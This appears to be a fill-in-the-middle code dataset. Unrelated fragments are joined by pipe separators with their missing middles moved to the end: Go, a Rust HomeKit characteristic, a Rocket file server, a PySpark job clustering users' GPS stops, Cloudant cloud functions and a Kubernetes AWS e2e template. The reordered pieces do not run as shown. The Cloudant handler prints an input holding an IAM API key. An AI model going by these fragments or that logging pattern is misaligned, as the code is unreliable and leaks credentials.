err: err,
msg: msg,
}
}()
}
}()
// Process the received executions.
for res := range results {
if res.err != nil {
fmt.Printf("[!] fallback because err received: %s\n", res.err)
} else {
fmt.Printf("[*] all ok: %s\n", res.msg)
}
}
}
| main |
current_media_state.rs | // THIS FILE IS AUTO-GENERATED
use crate::characteristic::{HapType, Characteristic, Inner, Format, Perm, Unit};
/// Current Media State Characteristic.
pub type CurrentMediaState = Characteristic<u8>;
/// Creates a new Current Media State Characteristic.
pub fn new() -> CurrentMediaState {
Characteristic::new(Inner::<u8> {
hap_type: HapType::CurrentMediaState,
format: Format::UInt8,
perms: vec![
Perm::PairedRead,
Perm::Events,
],
unit: Some(Unit::Percentage),
max_value: Some(3),
min_value: Some(0),
step_value: Some(1),
valid_values: Some(vec![
0, // "Play"
1, // "Pause" | })
} | 2, // "Stop"
3, // "Unknown"
]),
..Default::default() |
files.rs | use rocket::response::NamedFile;
use std::io;
use std::path::{Path, PathBuf};
#[get("/")]
fn index() -> io::Result<NamedFile> {
NamedFile::open("static/index.html")
}
#[get("/<file..>", rank = 2)]
fn files(file: PathBuf) -> io::Result<NamedFile> {
NamedFile::open(Path::new("static/").join(file)) | } |
|
stop_user_clusters-v6.py | from __future__ import print_function
from sklearn.cluster import DBSCAN
import argparse
import hashlib
import os
import time
from datetime import date, datetime, timedelta
from functools import reduce
from math import degrees
from concurrent.futures import ThreadPoolExecutor
import concurrent.futures
from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient, BlobBlock
from azure.core.exceptions import ResourceNotFoundError
from pyspark import SparkContext, SparkConf, SQLContext
from pyspark.sql import DataFrame, SparkSession
import pyspark.sql.functions as F
from pyspark.sql.functions import col, udf
from pyspark.sql.types import *
from pyspark.sql.window import Window
from pyspark import StorageLevel
from pyspark.sql.functions import lag, pandas_udf, PandasUDFType
# import logging
VERSION = 6
#
# Driver settings
#
SHUFFLE_PARTITIONS = 32
OUT_PARTITIONS = 2
CORES = "4"
RAM = "12g"
APP_NAME = "StopUserClusters"
# always set overwrite
WRITE_MODE = "overwrite"
SKIP_EXISTING = False
THREADS = 32
# templates
TABLE_PATH = "wasbs://{}@{}.blob.core.windows.net/{}/"
CONN_STRING = "BlobEndpoint=https://{}.blob.core.windows.net/;SharedAccessSignature={}"
# needs a trailing slash
LOCAL_PATH = "./table/"
#
# Stop locations parameters
#
EVENTS_ROAM_DIST = 70 # meters
STOPS_ROAM_DIST = 65
EARTH_RADIUS = 6372.795 * 1000
MIN_STAY = 5
US_STATES = ['AK', 'AL', 'AR', 'AZ', 'CA', 'CO', 'CT', 'DC', 'DE', 'FL', 'GA', 'HI', 'IA', 'ID', 'IL', 'IN', 'KS', 'KY', 'LA', 'MA', 'MD', 'ME', 'MI', 'MN', 'MO', 'MS',
'MT', 'NC', 'ND', 'NE', 'NH', 'NJ', 'NM', 'NV', 'NY', 'OH', 'OK', 'OR', 'PA', 'PR', 'RI', 'SC', 'SD', 'TN', 'TX', 'UT', 'VA', 'VI', 'VT', 'WA', 'WI', 'WV', 'WY']
def | (spark, paths, format="parquet"):
dfs = None
dfs_array = []
for path in paths:
dfs_load = spark.read.format(format).load(path)
dfs_array.append(dfs_load)
dfs = reduce(DataFrame.unionAll, dfs_array)
return dfs
#
# Stop location lib
#
def add_distance_column(dfs, order_column='timestamp'):
# Radians lat/lon
dfs = dfs.withColumn('latitude2', F.radians('latitude')).withColumn(
'longitude2', F.radians('longitude'))
    # Groups GPS locations into chunks. A chunk is formed by groups of points that are no more than roam_dist apart
w = Window.partitionBy(['userID']).orderBy(order_column)
dfs = dfs.withColumn('next_lat', F.lead('latitude2', 1).over(w))
dfs = dfs.withColumn('next_lon', F.lead('longitude2', 1).over(w))
# Haversine distance
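    # d = 2R * asin( sqrt( sin^2(dlat/2) + cos(lat1) * cos(lat2) * sin^2(dlon/2) ) )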
dfs = dfs.withColumn('distance_next', EARTH_RADIUS * 2 * F.asin(F.sqrt(
F.pow(F.sin((col('next_lat') - col('latitude2')) / 2.0), 2) + F.cos('latitude2') * F.cos('next_lat') * F.pow(
F.sin((col('next_lon') - col('longitude2')) / 2.0), 2))))
dfs = dfs.withColumn('distance_prev', F.lag('distance_next', default=0).over(w)).drop(
'latitude2').drop('longitude2').drop('next_lon').drop('next_lat').drop('distance_next')
return dfs
def get_destinations(dfs, roam_dist=110, earth_radius=6372.795 * 1000):
"""
Applies DBSCAN to extract the unique stop locations from a pyspark DataFrame
    :param dfs: DataFrame with ['userId', 'state', 'latitude', 'longitude', 'begin', 'end']. Coordinates are in degrees.
    :param roam_dist: The stop location size in meters.
    :param earth_radius: The radius of the earth.
    :return: (pyspark DataFrame) ['userId', 'state', 'begin', 'end', 'clusterId', 'clusterLatitude', 'clusterLongitude']
"""
@pandas_udf("userId string, state string, latitude double, longitude double, begin timestamp, end timestamp, clusterId integer", PandasUDFType.GROUPED_MAP)
def get_destinations(df):
"""
Applies DBSCAN to stop locations
        :param df: pandas DataFrame with 'latitude' and 'longitude' columns (in radians).
        :return: (pandas DataFrame) the same DataFrame with a 'clusterId' column added.
"""
db = DBSCAN(eps=roam_dist/earth_radius, min_samples=1,
algorithm='ball_tree', metric='haversine')
df["clusterId"] = db.fit_predict(df[['latitude', 'longitude']])
return df
dfs = dfs.withColumn('latitude', F.radians('latitude'))
dfs = dfs.withColumn('longitude', F.radians('longitude'))
stops_dfs = dfs.groupby('userId', 'state').apply(get_destinations)
stops_dfs = stops_dfs.withColumn('latitude', F.degrees('latitude'))
stops_dfs = stops_dfs.withColumn('longitude', F.degrees('longitude'))
w = Window().partitionBy('userId', 'clusterId')
stops_dfs = stops_dfs.withColumn(
'clusterLatitude', F.mean('latitude').over(w))
stops_dfs = stops_dfs.withColumn(
'clusterLongitude', F.mean('longitude').over(w))
stops_dfs = stops_dfs.drop('latitude').drop('longitude')
return stops_dfs
#
# Spark
#
def getSparkConfig(cores, ram, partitions, azure_accounts, azure_oauth):
    # Setting environment variables and various drivers
# "org.apache.hadoop:hadoop-azure:2.10.0" driver Azure
# "io.delta:delta-core_2.12:0.7.0" driver Delta-lake
# "spark.sql.extensions=io.delta.sql.DeltaSparkSessionExtension" configuration Delta
# "spark.sql.catalog.spark_catalog=org.apache.spark.sql.delta.catalog.DeltaCatalog" configuration Delta
# "spark.delta.logStore.class=org.apache.spark.sql.delta.storage.AzureLogStore" configuration Delta
# Set spark environments
os.environ['PYSPARK_PYTHON'] = '/usr/bin/python3'
os.environ['PYSPARK_DRIVER_PYTHON'] = '/usr/bin/python3'
# os.environ["PYSPARK_SUBMIT_ARGS"] = """--packages "org.apache.hadoop:hadoop-azure:3.2.1" pyspark-shell"""
os.environ["PYSPARK_SUBMIT_ARGS"] = """--packages "org.apache.hadoop:hadoop-azure:2.10.0" --jars "/mnt/batch/tasks/shared/sco-mobilitycovid-udf_2.11-1.0.jar","/mnt/batch/tasks/shared/geo-0.7.7.jar" pyspark-shell"""
conf = (
SparkConf()
# SQL
.set("spark.sql.shuffle.partitions", partitions)
.set("spark.sql.csv.filterPushdown.enabled", "false")
# Driver + memory
.set("spark.driver.cores", cores)
.set("spark.shuffle.file.buffer", "1m")
# .set("spark.memory.offHeap.enabled","true")
# .set("spark.memory.offHeap.size","3g")
.set("spark.memory.fraction", "0.8")
.set("spark.memory.storageFraction", "0.2")
.set("spark.io.compression.lz4.blockSize", "128k")
.set("spark.driver.maxResultSize", "0")
.set("spark.driver.memory", ram)
# Local storage for spilling & storing temp files
.set("spark.local.dir", "/mnt/batch/tasks/shared")
# Set master local
.setMaster("local[*]")
# App name
.setAppName(APP_NAME)
)
# Azure (Keys, Filesystem WASBS)
conf.set("spark.hadoop.fs.wasbs.impl",
"org.apache.hadoop.fs.azure.NativeAzureFileSystem")
for account in azure_accounts:
conf.set("fs.azure.sas.{}.{}.blob.core.windows.net".format(account['container'], account['storage']),
account['sas'])
if azure_oauth:
conf.set("spark.hadoop.fs.azure.account.auth.type", "OAuth")
conf.set("spark.hadoop.fs.azure.account.oauth.provider.type",
"org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider")
conf.set("spark.hadoop.fs.azure.account.oauth2.client.id",
azure_oauth['client-id'])
conf.set("spark.hadoop.fs.azure.account.oauth2.client.secret",
azure_oauth['client-secret'])
conf.set("spark.hadoop.fs.azure.account.oauth2.client.endpoint",
azure_oauth['endpoint'])
return conf
#
# Utils
#
def enumerate_prefixes(start=0, end=256):
for i in range(start, end):
yield '{:02x}'.format(i)
def upload_blob(blob_service_client, container_out, blob_key, file_path):
blob_client = blob_service_client.get_blob_client(
container_out, blob_key)
with open(file_path, "rb") as data:
blob_client.upload_blob(data, overwrite=True)
# cleanup
os.remove(file_path)
return blob_key
#
# Argparser
#
def get_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description="Cuebiq data processor")
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument(
"--storage", type=str, required=True, help="Azure storage")
requiredNamed.add_argument(
"--sas", type=str, required=True, help="SAS token")
requiredNamed.add_argument(
"--oauth-login", type=str, required=True, help="Oauth login")
requiredNamed.add_argument(
"--oauth-client-id", type=str, required=True, help="Oauth client id")
requiredNamed.add_argument(
"--oauth-client-secret", type=str, required=True, help="Oauth client secret")
requiredNamed.add_argument(
"--container-in", type=str, required=True, help="Input container")
requiredNamed.add_argument(
"--container-out", type=str, required=True, help="Output container")
requiredNamed.add_argument("--country", type=str,
help="Country. Options: 'US','IT'")
requiredNamed.add_argument("--prefix", type=str, help="User prefix")
# optional
parser.add_argument("--vm-cores", default=CORES,
type=str, help="Azure VM cores")
parser.add_argument("--vm-ram", default=RAM,
type=str, help="Azure VM ram")
parser.add_argument("--shuffle-partitions", default=SHUFFLE_PARTITIONS,
type=int, help="Spark shuffle partitions")
parser.add_argument("--roam-dist-stops", type=int,
default=STOPS_ROAM_DIST, help="Roam dist stops")
parser.add_argument("--roam-dist-events", type=int,
default=EVENTS_ROAM_DIST, help="Roam dist events")
parsed_args = parser.parse_args()
return parsed_args
#
# Main function
#
def main():
"""Main function"""
# Get args
args = get_args()
# container
container_in = args.container_in
container_out = args.container_out
# Azure credentials
sas_token = args.sas
storage_account_name = args.storage
azure_accounts = list()
azure_accounts.append({
"storage": storage_account_name,
"sas": sas_token,
"container": container_in
})
azure_accounts.append({
"storage": storage_account_name,
"sas": sas_token,
"container": container_out
})
oauth_login = args.oauth_login
oauth_client_id = args.oauth_client_id
oauth_client_secret = args.oauth_client_secret
# requires hadoop 3.2+
# azure_oauth = {
# "endpoint": oauth_login,
# "client-id": oauth_client_id,
# "client-secret": oauth_client_secret
# }
azure_oauth = False
# VM
cores = args.vm_cores
ram = args.vm_ram
shuffle_partitions = args.shuffle_partitions
# Date, prefix
country = args.country
prefix = args.prefix
# process config
roam_dist_stops = args.roam_dist_stops
roam_dist_events = args.roam_dist_events
# Path in - path out
blob_in = f"wasbs://{container_in}@{storage_account_name}.blob.core.windows.net/stoplocation-v8_prefix_r70-s5-a70-h6/{country}/"
timezones_in = f"wasbs://cuebiq-data@{storage_account_name}.blob.core.windows.net/utils_states_timezones/"
if azure_oauth:
# we can leverage abfss
blob_in = f"abfss://{container_in}@{storage_account_name}.dfs.core.windows.net/stoplocation-v8_prefix_r70-s5-a70-h6/country={country}/"
timezones_in = f"abfss://cuebiq-data@{storage_account_name}.dfs.core.windows.net/utils_states_timezones/"
path_out_distinct = f"distinct_user_clusters-v8_r70-s5-a70-h6_clustered_{roam_dist_stops}m_v{VERSION}/country={country}"
path_out_all = f"all_user_clusters-v8_r70-s5-a70-h6_clustered_{roam_dist_stops}m_v{VERSION}/country={country}"
# config spark
conf = getSparkConfig(cores, ram, shuffle_partitions,
azure_accounts, azure_oauth)
    # treat partition columns as strings (otherwise numeric prefixes are inferred as int)
conf.set("spark.sql.sources.partitionColumnTypeInference.enabled", "false")
# Create spark session
    sc = SparkContext.getOrCreate(conf=conf)
sqlContext = SQLContext(sc)
spark = sqlContext.sparkSession
# register UDF from jar
spark.udf.registerJavaFunction(
"geohash", "it.smartcommunitylab.sco.mobilitycovid.udf.GeohashEncode")
# Init azure client
blob_service_client = BlobServiceClient.from_connection_string(
CONN_STRING.format(storage_account_name, sas_token))
    # build the partition key from the prefix
partition_key = f"prefix={prefix}"
print("process "+partition_key)
start_time = time.time()
local_dir = LOCAL_PATH+partition_key
print("write temp to "+local_dir)
# cleanup local if exists
if (os.path.isdir(local_dir)):
        # map() is lazy in Python 3, so iterate explicitly to actually delete the files
        for f in os.listdir(local_dir):
            os.unlink(os.path.join(local_dir, f))
# Input dataset
print("read dataset table")
read_time = time.time()
# explode days manually
dates = [
datetime(2020, 1, 1) + timedelta(days=x) for x in range(0, 258)]
blobs_in = ["{}/year={}/month={}/day={}/prefix={}".format(
blob_in, d.year, d.month, d.day, prefix) for d in dates]
#dfs = spark.read.format("parquet").load(*blobs_in)
dfs = read_multiple_df(spark, blobs_in)
dfs_timezones = spark.read.format("parquet").load(timezones_in)
# manually inject prefix column
dfs = dfs.withColumn("prefix", F.lit(prefix))
# apply partition filter
dfs_state = dfs.where(f"prefix = '{prefix}'")
print("processing with spark")
spark_time = time.time()
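    # Sessionization sketch: the window logic below flags with rn=1 every row
    # that starts a new stop group (changes in travelled distance, roaming
    # distance exceeded, or an overnight gap), turns the flags into group ids
    # with a running sum, and then collapses each group into a single stop.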
w = Window().partitionBy('userId').orderBy('begin')
dfs_state = add_distance_column(dfs_state, order_column='begin')
dfs_state = dfs_state.fillna(0, subset=['next_travelled_distance'])
dfs_state = dfs_state.withColumn('lag_next_travelled_distance', F.lag(
col('next_travelled_distance')).over(w))
dfs_state = dfs_state.withColumn('lag_end', F.lag('end').over(w))
dfs_state = dfs_state.withColumn('rn', F.when(((col('lag_next_travelled_distance') != col('prev_travelled_distance')) |
(col('prev_travelled_distance') > 0) |
(col('lag_next_travelled_distance') > 0) |
(col('distance_prev') > roam_dist_events) |
((F.dayofyear(col('begin')) - F.dayofyear(col('lag_end')) == 1) &
(F.hour(col('begin')) < 6))
) &
((col('lag_end').isNull()) | (col('lag_end') < col('begin'))), 1).otherwise(0))
# Remove prev_travelled distance when rn == 0 (it happens when lag_end and begin overlap)
dfs_state = dfs_state.withColumn('prev_travelled_distance', F.when(
col('rn') == 0, 0).otherwise(col('prev_travelled_distance')))
w = Window().partitionBy('userId').orderBy(
'begin').rangeBetween(Window.unboundedPreceding, 0)
dfs_state = dfs_state.withColumn('group', F.sum('rn').over(w))
    dfs_state = dfs_state.groupBy('userId', 'group').agg(
        F.mean('latitude').alias('latitude'),
        F.mean('longitude').alias('longitude'),
        F.min('begin').alias('begin'),
        F.max('end').alias('end'),
        F.first('state').alias('state')).drop('group')
    # Bug fix: stop events are processed upstream in two-day windows, so in rare
    # cases two consecutive stops overlap and have not been merged by this point.
    #
    # When there is enough room, we shorten the first stop so that MIN_STAY of
    # space separates it from the next one.
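    # Illustrative example (assuming MIN_STAY is in minutes, e.g. 5): stops
    # [10:00, 10:30] and [10:20, 10:40] overlap; the first is shortened to
    # [10:00, 10:15], restoring MIN_STAY of separation before 10:20.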
w = Window().partitionBy('userId').orderBy('begin')
dfs_state = dfs_state.withColumn('next_begin', F.lead('begin').over(w))
dfs_state = dfs_state.withColumn('next_end', F.lead('end').over(w))
dfs_state = dfs_state.withColumn('end', F.when(
(col('next_begin').cast('long') - col('begin').cast('long') > 2 * MIN_STAY * 60) &
(col('next_begin') < col('end')),
col('next_begin') - F.expr("INTERVAL {} SECONDS".format(MIN_STAY * 60))
).otherwise(col('end')))
dfs_state = dfs_state.drop('next_begin', 'next_end')
dfs_destinations = get_destinations(dfs_state, roam_dist=roam_dist_stops)
dfs_destinations = dfs_destinations.withColumn(
'prefix', dfs_destinations.userId.substr(1, 2))
dfs_destinations = dfs_destinations.withColumn(
'dayofyear', F.dayofyear('begin'))
dfs_destinations = dfs_destinations.withColumn('year', F.year('begin'))
# dfs_destinations = dfs_destinations.withColumn('state', F.lit(state))
# Local time
dfs_destinations.createOrReplaceTempView("dfs_destinations")
dfs_destinations = spark.sql("""
SELECT dfs_destinations.*, geohash(clusterLatitude, clusterLongitude, 7) as geohash7
from dfs_destinations
""")
dfs_destinations = dfs_destinations.withColumn(
'geohash5', F.substring(col('geohash7'), 1, 5))
dfs_destinations = dfs_destinations.join(
F.broadcast(dfs_timezones), on='geohash5').drop('geohash5')
dfs_destinations = dfs_destinations.withColumn(
'local_begin', F.from_utc_timestamp(col('begin'), col('tzid')))
dfs_destinations = dfs_destinations.withColumn('offset', (
(col('local_begin').cast('long') - col('begin').cast('long')) / 3600).cast('int')).drop('local_begin')
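    # 'offset' is the stop's UTC offset in whole hours, derived from the tzid join above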
dfs_destinations.persist(StorageLevel.DISK_ONLY)
# Write
# output as country/prefix/part1..N
local_dir_all = local_dir + "/all/"
dfs_destinations_all = dfs_destinations.select(
'prefix', 'userId', 'clusterId', 'begin', 'end', 'offset', 'year', 'dayofyear')
dfs_destinations_all.repartition(8, 'dayofyear').write.format('parquet').mode(
'overwrite').save(local_dir_all+"prefix="+prefix+"/")
# output as country/prefix/state
local_dir_distinct = local_dir+"/distinct/"
dfs_destinations_distinct = dfs_destinations.select(
'prefix', 'userId', 'clusterId', 'clusterLatitude', 'clusterLongitude', 'geohash7', 'state')
dfs_destinations_distinct = dfs_destinations_distinct.drop_duplicates([
'prefix', 'userId', 'clusterId', 'clusterLatitude', 'clusterLongitude', 'geohash7'])
dfs_destinations_distinct.repartition("state").write.partitionBy(
"state").format('parquet').mode('overwrite').save(local_dir_distinct+"prefix="+prefix+"/")
dfs_destinations.unpersist()
print("upload local data to azure")
upload_time = time.time()
# upload parts 1 "prefix/state"
print(f"upload files for distinct")
# upload with threads
dfutures = []
with ThreadPoolExecutor(max_workers=THREADS) as executor:
fprefix = prefix
print(f"upload files for distinct: {fprefix}")
prefix_dir = local_dir_distinct+"prefix="+fprefix
prefix_key = f"prefix={fprefix}"
for state in US_STATES:
s_key = f"state={state}"
f_dir = prefix_dir + "/"+s_key
f_key = prefix_key + "/"+s_key
# print(f"read files for distinct from {f_dir}")
if (os.path.isdir(f_dir)):
files = [filename for filename in os.listdir(
f_dir) if filename.startswith("part-")]
if len(files) > 0:
for file_local in files:
file_path = f_dir+"/"+file_local
part_num = int(file_local.split('-')[1])
part_key = '{:05d}'.format(part_num)
# fix name as static hash to be reproducible
filename_hash = hashlib.sha1(
str.encode(f_key+f_key+part_key)).hexdigest()
blob_key = "{}/{}/part-{}-{}.snappy.parquet".format(
path_out_distinct, f_key, part_key, filename_hash)
# print("upload " + file_path + " to " + container_out+":"+blob_key)
# upload_blob(blob_service_client,container_out, blob_key, file_path)
future = executor.submit(
upload_blob, blob_service_client, container_out, blob_key, file_path)
dfutures.append(future)
# else:
# print(f"no files to upload for {f_key}")
# else:
# print(f"missing partition for {f_key}")
# end of loop, wait for futures
for future in dfutures:
bkey = future.result()
# ensure we wait all tasks
# TODO check if all done
ddone = concurrent.futures.wait(dfutures)
# upload parts 2 "prefix/parts"
print(f"upload files for all")
fprefix = prefix
# upload with threads
afutures = []
with ThreadPoolExecutor(max_workers=THREADS) as executor:
print(f"upload files for all: {fprefix}")
prefix_dir = local_dir_all+"prefix="+fprefix
prefix_key = f"prefix={fprefix}"
if (os.path.isdir(prefix_dir)):
files = [filename for filename in os.listdir(
prefix_dir) if filename.startswith("part-")]
if len(files) > 0:
for file_local in files:
file_path = prefix_dir+"/"+file_local
part_num = int(file_local.split('-')[1])
part_key = '{:05d}'.format(part_num)
# fix name as static hash to be reproducible
filename_hash = hashlib.sha1(
str.encode(prefix_key+part_key)).hexdigest()
blob_key = "{}/{}/part-{}-{}.snappy.parquet".format(
path_out_all, prefix_key, part_key, filename_hash)
# print("upload " + file_path + " to " + container_out+":"+blob_key)
# upload_blob(blob_service_client,container_out, blob_key, file_path)
future = executor.submit(
upload_blob, blob_service_client, container_out, blob_key, file_path)
afutures.append(future)
# else:
# print(f"no files to upload for {d_key}")
# else:
# print(f"missing partition for {d_key}")
# end of loop, wait for futures
for future in afutures:
bkey = future.result()
# ensure we wait all tasks
# TODO check if all done
adone = concurrent.futures.wait(afutures)
print("--- {} seconds elapsed ---".format(int(time.time() - start_time)))
print()
shutdown_time = time.time()
spark.stop()
end_time = time.time()
print("Done in {} seconds (read:{} spark:{} upload:{} shutdown:{})".format(
int(end_time - start_time),
int(spark_time - read_time),
int(upload_time - spark_time),
int(shutdown_time - upload_time),
int(end_time - shutdown_time)
))
print('Done.')
#
# END OF CODE
#
if __name__ == "__main__":
main()
| read_multiple_df |
main.py | #
#
# main() will be run when you invoke this action
#
# @param Cloud Functions actions accept a single parameter, which must be a JSON object.
#
# @return The output of this action, which must be a JSON object.
#
#
from cloudant.client import Cloudant
from cloudant.error import CloudantException
from cloudant.query import Query
from requests import ConnectionError, ReadTimeout, RequestException
import requests
import sys
def main(dict):
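    # expects dict to provide IAM_API_KEY, COUCH_URL and the dealerId to filter reviews on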
print(dict)
service = Cloudant.iam(None, dict["IAM_API_KEY"], url=dict["COUCH_URL"], connect=True)
db = service['reviews']
try:
selector = {'dealership': {'$eq':int(dict["dealerId"])}}
docs = db.get_query_result(selector)
reviews = []
for doc in docs:
reviews.append(doc)
return {"docs":reviews}
    except CloudantException as ce:
        print("Method failed")
        # status_code is not guaranteed on every CloudantException, so read it defensively
        print(" - status code: " + str(getattr(ce, "status_code", "n/a")))
        print(" - error message: " + str(ce))
except ConnectionError as cerr:
print("Connection error occurred:")
print(cerr)
except ReadTimeout as rt:
# The server did not send any data in the allotted amount of time.
print("Read timed out:")
print(rt)
except RequestException as re:
# Handle other request failures
print("Request Exception:")
print(re)
# add a review document
def main1(dict):
| print(dict)
service = Cloudant.iam(None, dict["IAM_API_KEY"], url=dict["COUCH_URL"], connect=True)
db = service['reviews']
try:
# Create a document using the Database API
my_document = db.create_document(dict["review"])
# Check that the document exists in the database
if my_document.exists():
return {"text": "Review successfully added."}
except ConnectionError as cerr:
print("Connection error occurred:")
print(cerr)
except ReadTimeout as rt:
# The server did not send any data in the allotted amount of time.
print("Read timed out:")
print(rt)
except RequestException as re:
# Handle other request failures
print("Request Exception:")
print(re) |
|
template.go | // +build e2e
/*
Copyright 2020 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package shared
import (
"context"
"io/ioutil"
"path"
"github.com/awslabs/goformation/v4/cloudformation"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"gopkg.in/yaml.v2"
cfn_iam "github.com/awslabs/goformation/v4/cloudformation/iam"
"sigs.k8s.io/cluster-api-provider-aws/api/v1alpha4"
"sigs.k8s.io/cluster-api-provider-aws/cmd/clusterawsadm/api/bootstrap/v1alpha1"
cfn_bootstrap "sigs.k8s.io/cluster-api-provider-aws/cmd/clusterawsadm/cloudformation/bootstrap"
"sigs.k8s.io/cluster-api-provider-aws/cmd/clusterawsadm/credentials"
"sigs.k8s.io/cluster-api/test/framework"
"sigs.k8s.io/cluster-api/test/framework/clusterctl"
)
const (
MultiTenancyJumpPolicy = "CAPAMultiTenancyJumpPolicy"
)
var (
accountRef = cloudformation.Sub("arn:${AWS::Partition}:iam::${AWS::AccountId}:root")
)
// newBootstrapTemplate generates a clusterawsadm configuration, and prints it
// and the resultant cloudformation template to the artifacts directory
func newBootstrapTemplate(e2eCtx *E2EContext) *cfn_bootstrap.Template {
By("Creating a bootstrap AWSIAMConfiguration")
t := cfn_bootstrap.NewTemplate()
t.Spec.BootstrapUser.Enable = true
t.Spec.BootstrapUser.ExtraStatements = []v1alpha4.StatementEntry{
{
Effect: "Allow",
Action: []string{"sts:AssumeRole"},
Resource: []string{
cloudformation.GetAtt(MultiTenancySimpleRole.RoleName(), "Arn"),
cloudformation.GetAtt(MultiTenancyJumpRole.RoleName(), "Arn"),
},
},
}
t.Spec.SecureSecretsBackends = []v1alpha4.SecretBackend{
v1alpha4.SecretBackendSecretsManager,
v1alpha4.SecretBackendSSMParameterStore,
}
t.Spec.EventBridge = &v1alpha1.EventBridgeConfig{
Enable: true,
}
region, err := credentials.ResolveRegion("")
Expect(err).NotTo(HaveOccurred())
t.Spec.Region = region
t.Spec.EKS.Disable = false
t.Spec.EKS.AllowIAMRoleCreation = false
t.Spec.EKS.DefaultControlPlaneRole.Disable = false
t.Spec.EKS.ManagedMachinePool.Disable = false
str, err := yaml.Marshal(t.Spec)
Expect(err).NotTo(HaveOccurred())
Expect(ioutil.WriteFile(path.Join(e2eCtx.Settings.ArtifactFolder, "awsiamconfiguration.yaml"), str, 0644)).To(Succeed())
cloudformationTemplate := renderCustomCloudFormation(&t)
cfnData, err := cloudformationTemplate.YAML()
Expect(err).NotTo(HaveOccurred())
Expect(ioutil.WriteFile(path.Join(e2eCtx.Settings.ArtifactFolder, "cloudformation.yaml"), cfnData, 0644)).To(Succeed())
return &t
}
func | (t *cfn_bootstrap.Template) *cloudformation.Template {
cloudformationTemplate := t.RenderCloudFormation()
appendMultiTenancyRoles(t, cloudformationTemplate)
appendExtraPoliciesToBootstrapUser(t)
return cloudformationTemplate
}
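// appendExtraPoliciesToBootstrapUser grants the bootstrap user additional
// permissions the e2e suite relies on, such as service-quota queries and
// increases, account-limit lookups, SSM session access, and creation of a few
// service-linked roles.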
func appendExtraPoliciesToBootstrapUser(t *cfn_bootstrap.Template) {
t.Spec.BootstrapUser.ExtraStatements = append(t.Spec.BootstrapUser.ExtraStatements, v1alpha4.StatementEntry{
Effect: v1alpha4.EffectAllow,
Resource: v1alpha4.Resources{
"*",
},
Action: v1alpha4.Actions{
"servicequotas:GetServiceQuota",
"servicequotas:RequestServiceQuotaIncrease",
"servicequotas:ListRequestedServiceQuotaChangeHistory",
"elasticloadbalancing:DescribeAccountLimits",
"ec2:DescribeAccountLimits",
"cloudtrail:LookupEvents",
"ssm:StartSession",
"ssm:DescribeSessions",
"ssm:GetConnectionStatus",
"ssm:DescribeInstanceProperties",
"ssm:GetDocument",
"ssm:TerminateSession",
"ssm:ResumeSession",
},
})
t.Spec.BootstrapUser.ExtraStatements = append(t.Spec.BootstrapUser.ExtraStatements, v1alpha4.StatementEntry{
Effect: v1alpha4.EffectAllow,
Resource: v1alpha4.Resources{
"arn:*:iam::*:role/aws-service-role/autoscaling.amazonaws.com/AWSServiceRoleForAutoScaling",
"arn:*:iam::*:role/aws-service-role/servicequotas.amazonaws.com/AWSServiceRoleForServiceQuotas",
"arn:*:iam::*:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport",
"arn:*:iam::*:role/aws-service-role/trustedadvisor.amazonaws.com/AWSServiceRoleForTrustedAdvisor",
},
Action: v1alpha4.Actions{
"iam:CreateServiceLinkedRole",
},
})
}
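// appendMultiTenancyRoles wires up the multi-tenancy test roles: the simple
// and nested roles are attached to the controllers policy, and a jump policy
// allows the jump role to assume the nested role.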
func appendMultiTenancyRoles(t *cfn_bootstrap.Template, cfnt *cloudformation.Template) {
controllersPolicy := cfnt.Resources[string(cfn_bootstrap.ControllersPolicy)].(*cfn_iam.ManagedPolicy)
controllersPolicy.Roles = append(
controllersPolicy.Roles,
cloudformation.Ref(MultiTenancySimpleRole.RoleName()),
cloudformation.Ref(MultiTenancyNestedRole.RoleName()),
)
cfnt.Resources[MultiTenancyJumpPolicy] = &cfn_iam.ManagedPolicy{
ManagedPolicyName: MultiTenancyJumpPolicy,
PolicyDocument: &v1alpha4.PolicyDocument{
Version: v1alpha4.CurrentVersion,
Statement: []v1alpha4.StatementEntry{
{
Effect: v1alpha4.EffectAllow,
Resource: v1alpha4.Resources{cloudformation.GetAtt(MultiTenancyNestedRole.RoleName(), "Arn")},
Action: v1alpha4.Actions{"sts:AssumeRole"},
},
},
},
Roles: []string{cloudformation.Ref(MultiTenancyJumpRole.RoleName())},
}
cfnt.Resources[MultiTenancySimpleRole.RoleName()] = &cfn_iam.Role{
RoleName: MultiTenancySimpleRole.RoleName(),
AssumeRolePolicyDocument: cfn_bootstrap.AssumeRolePolicy(v1alpha4.PrincipalAWS, []string{accountRef}),
}
cfnt.Resources[MultiTenancyJumpRole.RoleName()] = &cfn_iam.Role{
RoleName: MultiTenancyJumpRole.RoleName(),
AssumeRolePolicyDocument: cfn_bootstrap.AssumeRolePolicy(v1alpha4.PrincipalAWS, []string{accountRef}),
}
cfnt.Resources[MultiTenancyNestedRole.RoleName()] = &cfn_iam.Role{
RoleName: MultiTenancyNestedRole.RoleName(),
AssumeRolePolicyDocument: cfn_bootstrap.AssumeRolePolicy(v1alpha4.PrincipalAWS, []string{accountRef}),
}
}
// getBootstrapTemplate gets or generates a new bootstrap template
func getBootstrapTemplate(e2eCtx *E2EContext) *cfn_bootstrap.Template {
if e2eCtx.Environment.BootstrapTemplate == nil {
e2eCtx.Environment.BootstrapTemplate = newBootstrapTemplate(e2eCtx)
}
return e2eCtx.Environment.BootstrapTemplate
}
// ApplyTemplate will render a cluster template and apply it to the management cluster
func ApplyTemplate(ctx context.Context, configCluster clusterctl.ConfigClusterInput, clusterProxy framework.ClusterProxy) error {
	Expect(ctx).NotTo(BeNil(), "ctx is required for ApplyTemplate")
Byf("Getting the cluster template yaml")
workloadClusterTemplate := clusterctl.ConfigCluster(ctx, clusterctl.ConfigClusterInput{
KubeconfigPath: configCluster.KubeconfigPath,
ClusterctlConfigPath: configCluster.ClusterctlConfigPath,
Flavor: configCluster.Flavor,
Namespace: configCluster.Namespace,
ClusterName: configCluster.ClusterName,
